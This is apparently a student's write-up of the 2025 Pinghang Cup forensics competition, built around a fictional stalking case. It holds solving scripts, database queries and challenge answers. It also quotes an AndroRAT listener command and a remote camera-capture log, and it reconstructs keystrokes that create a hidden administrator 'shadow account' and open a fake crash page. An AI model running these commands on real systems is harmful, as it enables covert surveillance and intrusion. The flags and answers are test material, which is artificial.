【比赛】2025平航杯结合SPC出题

致谢

题目背景

爱⽽不得，进而由爱生恨。作为有黑客背景的他，激发出了强烈的占有欲，虽然不能在真实物理世界成 为她的伴侣，但在虚拟世界⾥，他执着的要成为她的主宰，于是，我们的故事开始了……。手机，电 脑，服务器，⽊⻢，AI，Iot设备……无⼀幸免的都成为他的作案⼯具或⽬标，但最终在诸位明察秋毫的取证达人面前，都无处遁形，作恶者终将被绳之以法。追悔莫及的他最后终于明⽩，其实真正的爱，不是占有，而是放手！！！

2025年4⽉，杭州滨江警⽅接到辖区内市⺠刘晓倩(简称：倩倩)报案称：其个⼈电⼦设备疑似遭 ⼈监控。经初步调查，警⽅发现倩倩的手机存在可疑后台活动，手机可能存在被木马控制情况； 对倩倩计算机进⾏流量监控，捕获可疑流量包。遂启动电子数据取证程序。

警⽅通过对倩倩手机和恶意流量包的分析，锁定⼀名化名“起早王”的本地男子。经搜查其住所， 警⽅查扣⼀台个人电脑和服务器。技术分析显示，该服务器中存有与倩倩设备内同源的特制远控木马，可实时窃取手机摄像头、手机通信记录等相关敏感文件。进⼀步对服务器溯源，发现“起 早王”曾渗透其任职的科技公司购物网站，获得公司服务器权限，非法窃取商业数据并使用公司 的服务器搭建Trojan服务并作为跳板机实施远控。

请你结合以上案例并根据相关检材，完成下面的勘验工作。
密码：早起王的爱恋日记❤

计算机取证

7. 分析起早王的计算机检材，SillyTavern中账户起早王的创建时间是什么时候(格式：2020/1/1 01:01:01)

• 有毛病为啥SillyTavern搜索后找到文件夹，开启方式不在此文件下层，在上层的bat文件。。。
• 初步推测是因为SillyTavern账密在日记里，所以我搜到的是日记的日志文件？？？
• SillyTavern账户密码在日记里，进入得到磁盘解密密码

很多思路都是找日志

9. 分析起早王的计算机检材，SillyTavern中起早王与ai女友聊天所调用的语言模型(带文件后缀)(格式：xxxxx-xxxxxxx.xxxx)

• sq思路
  • 日志里边，一般先点data，然后再找
  • 或者everything小倩
• Tifa-DeepsexV2-7b-Cot-0222-Q8

12. 分析起早王的计算机检材，最早被换脸的图片所使用的换脸模型是什么(带文件后缀)(格式：xxxxxxxxxxx.xxxx)

• 不知道为什么是model搜索后选这个？？？
• 文件夹搜索，everything好像搜索不到加密磁盘

"face_detector_model": "yoloface",
"face_landmarker_model": "2dfan4",
"face_occluder_model": "xseg_1",
"face_parser_model": "bisenet_resnet_34",
"age_modifier_model": "styleganex_age",
"deep_swapper_model": "iperov/elon_musk_224",
"expression_restorer_model": "live_portrait",
"face_editor_model": "live_portrait",
"face_enhancer_model": "gfpgan_1.4",
"face_swapper_model": "inswapper_128_fp16", # 选了这个
"frame_colorizer_model": "ddcolor",
"frame_enhancer_model": "span_kendata_x4",
"lip_syncer_model": "wav2lip_gan_96"

• 直接搜.json能看到对应的配置文件，而且只有前三个是有时间的，查看最早的配置文件【来自xc学长未尝试】

13. 分析起早王的计算机检材，neo4j中数据存放的数据库的名称是什么(格式：abd.ef)

• data/databases
• 找到graph.db

14. 分析起早王的计算机检材，neo4j数据库中总共存放了多少个节点(格式：1)

• neo4j.bat console
• http://localhost:7474/
• 我的学习笔记里面找思维导图，有账密
  
• 17088个

15. 分析起早王的计算机检材，neo4j数据库内白杰的⼿机号码是什么(格式：12345678901)

• 成功方案3个
  • 去除limit25后导出csv文件直接ctrl+F搜索
  • sq版本，一开始莫名其妙搜不到，后面手打成功了。。。

MATCH (u:person {name: '⽩杰'})
RETURN u.mobile;

• xc版本

MATCH (n {name:'白杰'})
RETURN n;

16. 分析起早王的计算机检材，分析neo4j数据库内数据，统计在2025年4月7日至13日期间使用非授权设备登录且登录地点超出其注册时登记的两个以上城市的⽤户数量(格式：1)【待学习】

• 查了半天全是赛后复现。。放弃吧

MATCH (u:User)-[:HAS_LOGIN]->(l:Login)-[:FROM_IP]->(ip:IP)
MATCH (l)-[:USING_DEVICE]->(d:Device)
WHERE
l.time < datetime('2025-04-14')
AND ip.city <> u.reg_city
AND NOT (u)-[:TRUSTS]->(d)
WITH
u,
collect(DISTINCT ip.city) AS 异常登录城市列表,
collect(DISTINCT d.device_id) AS 未授权设备列表,
count(l) AS 异常登录次数
WHERE size(异常登录城市列表) > 2
RETURN
u.user_id AS 用户ID,
u.real_name AS 姓名,
异常登录城市列表,
未授权设备列表, 异常登录次数
ORDER BY 异常登录次数 DESC;

18. 分析起早王的计算机检材，起早王的虚拟货币钱包是什么(格式：0x11111111)

• 浏览器历史记录-最近关闭-metamask
• 重置密码是卡死的，但不需要重置上面也有地址：0xd8786a1345cA969C792d9328f8594981066482e9

注意SHA256格式：字母大小写

def uppercase_to_lowercase(text):
    return text.lower()

# 示例
original_string = input("输入：")
result = uppercase_to_lowercase(original_string)
print(result)  

19. 分析起早王的计算机检材，起早王请高手为倩倩发行了虚拟货币，请问倩倩币的最大供应量是多少(格式：100qianqian)

AI题目（注意：该题目要python 3.10环境，建议3.10.6）

22-25.分析crack文件，获得flag1(格式：flag1{123456})

• 使用github开源软件解密，下载位置，使用方法
• flag1{you_are_so_smart} ; flag2{prompt_is_easy} ; flag3{no_question_can_kill_you} ; flag4{You_have_mastered_the_AI}

手机部分

26. 该检材的备份提取时间（UTC）(格式：2020/1/1 01:01:01)

• 2025-04-15 18:11:18.838 +0800
• 减8

27. 分析倩倩的手机检材,手机内Puzzle_Game拼图程序拼图APK中的Flag1是什么

• 在Java中，Byte.MAX_VALUE 是 127，Byte.MIN_VALUE = -128
• 密码：两种方法

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

MAGIC_NUMBERS = [113, 99, 92, 106, 89, 98, 54, 113, 104, 89, 117, 100, 113, 127, 124, 89]
key_bytes = bytearray(len(MAGIC_NUMBERS))
for i in range(len(MAGIC_NUMBERS)):
    key_bytes[i] = MAGIC_NUMBERS[i] ^ 6
print(bytes(key_bytes))
# >>> b'weZl_d0wn_sbwyz_'

• 密文其实是在下面的 hexStringToByteArray 方法中（理解不了一点伪C代码。。可能这位置靠猜？

• 判断AES使用的是ECB模式
  • 如果代码中没有指定模式，通常是ECB
  • 如果是CBC模式，通常会有IV参数

byte[] decrypted = decryptAESBlock(cipherBytes, expandedKey, iv);

29. 分析倩倩的手机检材,木马app是怎么被安装的（网址）(格式：http://127.0.0.1:1234/)

• 还有种猜测，靠时间推

30. 分析倩倩的手机检材,检材内的木马app的hash是什么(格式：大写md5)

31. 分析倩倩的手机检材,检材内的木马app的应用名称是什么【格式：Baidu】

• Google Service Framework
• 纯猜啊。。

32. 分析倩倩的手机检材,检材内的木马app的使用什么加固(格式：腾讯乐固)

33. 分析倩倩的手机检材,检材内的木马软件所关联到的ip和端口是什么(格式：127.0.0.1:1111)

• 但看后面日志文件能看到：

[root@localhost AndroRAT]# python3 androRAT.py --shell -i 0.0.0.0 -p 8000
...
Got connection from ('92.67.33.56', 60844)

• 但是：

• 不理解
• 自动分析牛啊

• 但分析报告简直一坨。。
• 没辙了放弃。。
• honglian技术员帮忙用backdex搞，注意此软件用32的找，脱壳后查看

• 成功了，泪流满面感激涕零٩(๑´3｀๑)۶

34. 该木马app控制手机摄像头拍了几张照片【格式：1】

35. 木马APP被使用的摄像头为(格式：Camera)

Interpreter:/> camList
0 --  Back Camera
1 --  Front Camera

Interpreter:/> takepic 1
[INFO] Taking Image
[ERROR] Unable to connect to the Camera

Interpreter:/> takepic 1
[INFO] Taking Image
[ERROR] Unable to connect to the Camera

Interpreter:/> takepic 1
[INFO] Taking Image
[ERROR] Unable to connect to the Camera

Interpreter:/> takepic 1
[INFO] Taking Image
[SUCCESS] Succesfully Saved in /root/AndroRAT/Dumps/Image_20250410-140555.jpg

Interpreter:/> takepic 1
[INFO] Taking Image
[SUCCESS] Succesfully Saved in /root/AndroRAT/Dumps/Image_20250410-140605.jpg

Interpreter:/> takepic 1
[INFO] Taking Image
[SUCCESS] Succesfully Saved in /root/AndroRAT/Dumps/Image_20250410-140622.jpg

• Front Camera

36. 分析倩倩的手机检材,木马APK通过调用什么api实现自身持久化(格式：JobStore)

37. 分析倩倩的手机检材,根据倩倩的身份证号请问倩倩来自哪里（格式：北京市西城区）

• 找了下离线工具,不知道为什么github打不开~~
• 已下载，E:\app-down\ID归属地查询工具\身份证归属地查询软件

38. 此手机检材的IMEI号是多少(格式：1234567890)【待】

• 一个是imei一个是sp_imei答案是前一个，不知道为什么。。

exe逆向部分

39. 分析GIFT.exe，该程序的md5是什么(格式：大写md5)

40. GIFT.exe的使用的编程语言是什么(格式：C)

• Python

41. 解开得到的LOVE2.exe的编译时间(格式：2025/1/1 01:01:01)

• 运行用虚拟机！！！这是病毒！！！
• 手机里面得到身份证，得到生日

42. 分析GIFT.exe，该病毒所关联到的ip和端口(格式：127.0.0.1:1111)【待】

• 环境前俩没会话信息，最后一个？？？莫名其妙
  
  
• 人家wp

43. 分析GIFT.exe，该病毒修改的壁纸md5(格式：大写md5)

• certutil -hashfile temp_wallpaper.png md5
• 支持MD2、MD4、MD5、SHA1、SHA256、SHA384和SHA512等。如果不指定HashAlgorithm，则默认使用MD5算法。
• 733FC4483C0E7DB1C034BE5246DF5EC0

44. 分析GIFT.exe，为对哪些后缀的文件进行加密： A.doc B.xlsx C.jpg D.png E.ppt

• 直接一个个新建试
• 或者ida在地址页面搜doc

45. 分析GIFT.exe，病毒加密后的文件类型是什么(格式：DOCX文档)

46. 分析GIFT.exe，壁纸似乎被隐形水印加密过了？请找到其中的Flag3(格式：flag3{xxxxxxxx})

• flag3{20241224_Our_First_Meet}

47. 分析GIFT.exe，病毒加密文件所使用的方法是什么(格式：Base64)

• RSA

48. 分析GIFT.exe，请解密test.love得到flag4(格式：flag4{xxxxxxxx})

• 随波逐流可以看

• 直接文本编辑器也可以看

-----BEGIN RSA PRIVATE KEY-----
MIIBVAIBADANBgkqhkiG9w0BAQEFAASCAT4wggE6AgEAAkEAjMqVpy4zP9cO5m/y
w0wmvdLzpUc4FNnUgpKJ26YimfDtA1cTZanNlxbmM25OTPsg2SaRUZdq7M3oGUel
gmRdFwIDAQABAkBYVtCZympLt0PZIQsAsWppltBbtxkgNCGcIBgx4sc5MT03erss
eyh2TqtQyO4aPYiOUUOWYw9hL4G6GFosXc+JAiEAvegkAhLXptnMlwCuwScK233w
cbBcxKWWPgZckdHkGPsCIQC9ynkuhrI4j2nc2eItr1NoU3Y1sfv0I601iNK1YXMJ
lQIgTYlomkgjMIagl865izdroW5sK578YXXSQATM6uStot0CIQCih1DNaiYXT6FN
sv0BOIKJ9edmRjxIr4C2NqyTDZfRHQIgUUhesxSUmNdc5QzckCAozLdPAlcAy7q+
k5ag7Oxp0r0=
-----END RSA PRIVATE KEY-----

• 我真的人傻了找不到test.love
• 没辙了存下脚本。。

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend

# 读取私钥
with open("private.pem", "rb") as key_file:
    private_key = serialization.load_pem_private_key(
        key_file.read(),
        password=None,  # 有密码就加上
        backend=default_backend()
    )

# 打印密钥位数和块大小
key_size_bits = private_key.key_size
key_size_bytes = key_size_bits // 8
print(f"私钥大小: {key_size_bits} 位 ({key_size_bytes} 字节)")

# 读取加密文件
with open("test.love", "rb") as f:
    encrypted_data = f.read()

# 分块解密（每块长度等于密钥长度）
decrypted_data = b""
for i in range(0, len(encrypted_data), key_size_bytes):
    block = encrypted_data[i:i + key_size_bytes]
    if len(block) != key_size_bytes:
        raise ValueError(f"第 {i//key_size_bytes + 1} 块大小不等于密钥长度，可能文件损坏")

    decrypted_block = private_key.decrypt(
        block,
        padding.PKCS1v15()
    )
    decrypted_data += decrypted_block

# 打印结果
try:
    print("解密内容：")
    print(decrypted_data.decode("utf-8"))
except UnicodeDecodeError:
    print("解密完成，但内容不是有效的 UTF-8，可以保存为二进制文件")

    # 也可以写入文件
    with open("decrypted_output.bin", "wb") as f:
        f.write(decrypted_data)
    print("已保存为 decrypted_output.bin")

服务器部分

4. 分析起早王的服务器检材，Trojan服务器混淆流量所使用的域名是什么【格式：xxx.xxx】

5. 分析起早王的服务器检材，Trojan服务运行的模式为：

A、foward
B、nat
C、server
D、client

• 一般配置文件里的run_type就是运行模式，但是这边明显是被人修改过了

• B

准备环节

• 连宝塔
• 连数据库，发现没有内容
• 这边需要导入数据库备份，而备份在电脑虚拟机中
• 火眼搜

• 导入navicat

• 成功

7. 分析网站后台登录密码的加密逻辑, 密码 sbwyz1 加密后存在数据库中的值

• 在这个地方我们可以看到加密函数为encrypt

• 把AUTH_CODE的值和密码给拼接在了一起算md5（这里不是字符串。。为啥好奇怪记下来）
• 找AUTH_CODE

• TPSHOP

• f8537858eb0eabada34e7021d19974ea

8. 网站后台显示的服务器GD版本是多少(格式：1.1.1 abc)

9. 网站后台中2016-04-01 00:00:00到2025-04-01 00:00:00订单列表有多少条记录(格式：1)

• 1292

10. 在网站购物满多少免运费(格式：1)

11. 分析网站日志，成功在网站后台上传木马的攻击者IP是多少(格式：1.1.1.1)

13. 攻击者使用工具对内网进行扫描后，rdp扫描结果中的账号密码是什么(格式：abc:def)

• 宝塔面板管理进入phpMyAdmin账密是对应数据库账密

14. 对于每个用户，计算其注册时间（用户表中的注册时间戳）到首次下单时间（订单表中最早时间戳）的间隔，找出间隔最短的用户id。（格式：1）

SELECT u.user_id, MIN(o.create_time) - u.reg_time  as time_diff 
FROM tp_users u 
JOIN tp_delivery_doc o ON u.user_id = o.user_id 
GROUP BY u.user_id, u.email, u.reg_time 
ORDER BY time_diff ASC 
LIMIT 1;

• 180

15. 统计每月订单数量，找出订单最多的月份（XXXX年XX月）

SELECT 
    EXTRACT(YEAR FROM FROM_UNIXTIME(o.create_time)) as year,
    EXTRACT(MONTH FROM FROM_UNIXTIME(o.create_time)) as month,
    COUNT(*) as order_count 
FROM tp_delivery_doc o
GROUP BY year, month
ORDER BY order_count DESC
LIMIT 1;

16. 找出连续三天内下单的用户并统计总共有多少个（格式：1）

SELECT 
    t1.user_id,
    MIN(FROM_UNIXTIME(t1.add_time)) AS earliest_order_date
FROM 
    tp_order t1
WHERE EXISTS (
    SELECT 1
    FROM tp_order t2
    WHERE t2.user_id = t1.user_id
    AND FROM_UNIXTIME(t1.add_time) > FROM_UNIXTIME(t2.add_time)
    AND DATEDIFF(FROM_UNIXTIME(t1.add_time), FROM_UNIXTIME(t2.add_time)) <= 3
)
GROUP BY 
    t1.user_id
ORDER BY 
t1.user_id;

流量分析取证

1. 请问侦查人员是用哪个接口进行抓到蓝牙数据包的（格式：DVI1-2.1）

• “USB很明显是usb的流量哇，所以问侦查人员我们就在BLE（也就是蓝牙嘛，Bluetooth）看看”——sq

2. 起早王有一个用于伪装成倩倩耳机的蓝牙设备，该设备的原始设备名称为什么（格式：XXX_xxx 具体大小写按照原始内容）

• tshark导出为json文件，方便搜索分析

tshark -r E:\平航杯工作位置\BLE.pcapng -T json > BLE.json  
# 把tshark.exe路径加入环境变量PATH

import re
def extract_device_names(file_path):
    # 设备名称的集合（自动去重）
    device_names = set()
    # 正则表达式模式，用于匹配设备名称
    pattern = re.compile(r'"btcommon\.eir_ad\.entry\.device_name":\s*"([^"]+)"')
    with open(file_path, 'r', encoding='utf-8') as file:
        for line in file:
            # 在每一行中查找所有匹配项
            matches = pattern.findall(line)
            for match in matches:
                # 将找到的设备名称添加到集合中（自动处理重复）
                device_names.add(match)
            # 输出结果
    print("提取的设备名称列表：")
    for name in sorted(device_names):  # 按字母顺序排序输出
        print(name)
# 文件路径
file_path = "BLE.json"
extract_device_names(file_path)

• 不少乱码，里边正常的就
  • Cracked
  • Flipper 123all
  • QQ_WF_SP8OON
• 搜到Flipper 123all可以拿来伪装蓝牙设备

3. 起早王有一个用于伪装成倩倩耳机的蓝牙设备，该设备修改成耳机前后的大写MAC地址分别为多少（格式：32位小写md5(原MAC地址_修改后的MAC地址) ，例如md5(11:22:33:44:55:66_77:88:99:AA:BB:CC)=a29ca3983de0bdd739c97d1ce072a392 ）

• 根据题干，QQ是倩倩的，Flipper是起早王的

• 915c25495da483dfbf42c44bf5210c40

4. 流量包中首次捕获到该伪装设备修改自身名称的UTC+0时间为？（格式：2024/03/07 01:02:03.123）

• 注意是UTC+0所以-8小时2025/04/09 02:31:26.710

5. 起早王中途还不断尝试使用自己的手机向倩倩电脑进行广播发包，请你找出起早王手机蓝牙的制造商数据（格式：0x0102030405060708）

6. 起早王的真名是什么（格式：Cai_Xu_Kun 每个首字母均需大写 ）

• neta直接跑

• 或者手动：
• 看另一个附件了，一样导出

tshark -r E:\平航杯工作位置\USBPcap.pcapng -T json > USBPcap.json

• 然后脚本

import json
# 定义正常按键映射表
normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i","0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r","16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1","1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[","30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "`", "36": ",", "37": ".", "38": "/","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
# 定义Shift键按下时的按键映射表
shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I","0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R","16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!","1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")","28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{","30": "}", "31": "|", "32": "~", "33": ":", "34": "\"", "35": "~", "36": "<", "37": ">", "38": "?","39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>","40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}
def extract_usbhid_data(json_file):
    with open(json_file, 'rb') as file:
        data = json.load(file)
    
    result_string = ""
    for packet in data:
        layers = packet['_source']['layers']
        if 'usbhid.data' in layers:
            usbhid_data = layers['usbhid.data'].split(':')
            
            # 提取第二个字节（用于判断是否使用shiftKeys）
            second_byte = usbhid_data[1]
            
            # 根据第二个字节选择合适的映射表
            key_map = shiftKeys if second_byte != "00" else normalKeys
            
            # 遍历所有可能的按键数据（从第三个字节开始）
            for byte_index in range(2, len(usbhid_data)):
                key_code = usbhid_data[byte_index]
                if key_code == "00":
                    continue  # 忽略空值
                
                key_char = key_map.get(key_code, '')
                result_string += key_char
    
    return result_string
if __name__ == "__main__":
    extracted_string = extract_usbhid_data('USBPcap.json')
print("Extracted String:", extracted_string)

• 跑出来：

m]<F6>[2m[m33[]3333mmmbao<SPACE>bao,zui<SPACE>jin<SPACE>you<SPACE>ge<SPACE>nan<SPACE>sheng<SPACE>xiang<SPACE>zhui<SPACE>wo,ta<SPACE>jiaaoo<SPACE>wwaang<SPACE>qi<SPACE>zhao<DEL><DEL><DEL><DEL>qi<SPACE>zao<SPACE>wang<SPACE>ta<SPACE>shuo<SPACE>ta<SPACE>ai<SPACE>wo,dan<SPACE>shi<SPACE>cong<SPACE>bu<SPACE>baanng<SPACE>wo<SPACE>na<SPACE>kuai<SPACE>di,hao<SPACE>fan<SPACE>aRcmd<RET>L]bdfgghiiklnnoomljji]i<F7>h]i]i3j]k3lmlmkmhigmgfmemedmbcaaabbb[22[<F6>[<F6>[2222[2[2[<F6>[2llllllllm2m[][3<F6>[mm2mmmmmm]abcedeemdme]eefeggif3fcbba]3mmaccmcmf3f]h]g3f]e3d3c]c3b]b]]3mmmmm[[<F6><F6><F6><F6>[l2llabeeegffdca<SPACE>whoami<RET>net<SPACE>user<RET>net<SPACE>user<SPACE>qianqianwoaini$<SPACE>abcdefghijk<CAP>i<CAP>mn<SPACE>/add<RET>net<SPACE>localgroup<SPACE>administrators<SPACE>qianqianwoaini$<SPACE>/add<RET>net<SPACE>user<SPACE>qianqianwoaini$<SPACE>/del[ll22<F6><F6><F6><F6>[[[22lmll222l2llllllllcgikllmmlljjhhhfecb<F7><F7>]]<F6><F6><F6><F6><F6><F6>[22[2[[[[<F6>[<F6><F6><F6>[<F6>[[2[22lmlm<RET>net<SPACE>localgroup<SPACE>administrators<SPACE>qianqianwoaini$<SPACE>/add<RET>rundll32<SPACE>url.dll,<CAP>f<CAP>ile<CAP>p<CAP>rotocol<CAP>h<CAP>andler<SPACE>https://fakeupdate.net/win10ue/bsod.htmlgmjmk3gecmcmaa3mmmamm<RET>ceghkm<F7>m<F7>n<F7>n<F7>l<F7>l]j<F7>h]fdb<F7><F7>lllllllll

• 整理有：

bao bao,zui jin you ge nan sheng xiang zhui wo,ta jiaaoo wwaang qi zhao<DEL><DEL><DEL><DEL>qi zao wang ta shuo ta ai wo,dan shi cong bu baanng wo na kuai di,hao fan a

• Wang_Qi_Zhao

7. 起早王对倩倩的电脑执行了几条 cmd 里的命令

• 7
• 上题整理：

whoami
net user
net user qianqianwoaini$ abcdefghijkImn /add
net localgroup administrators qianqianwoaini$ /add
net user qianqianwoaini$ /del
net localgroup administrators qianqianwoaini$ /add
rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html

8. 倩倩电脑中影子账户的账户名和密码

• 账户名: qianqianwoaini$ 密码: abcdefghijkImn
• net user qianqianwoaini$ abcdefghijkImn /add

9. 起早王对倩倩的电脑执行的最后一条命令¶

• rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html
• 开了个假蓝屏的网页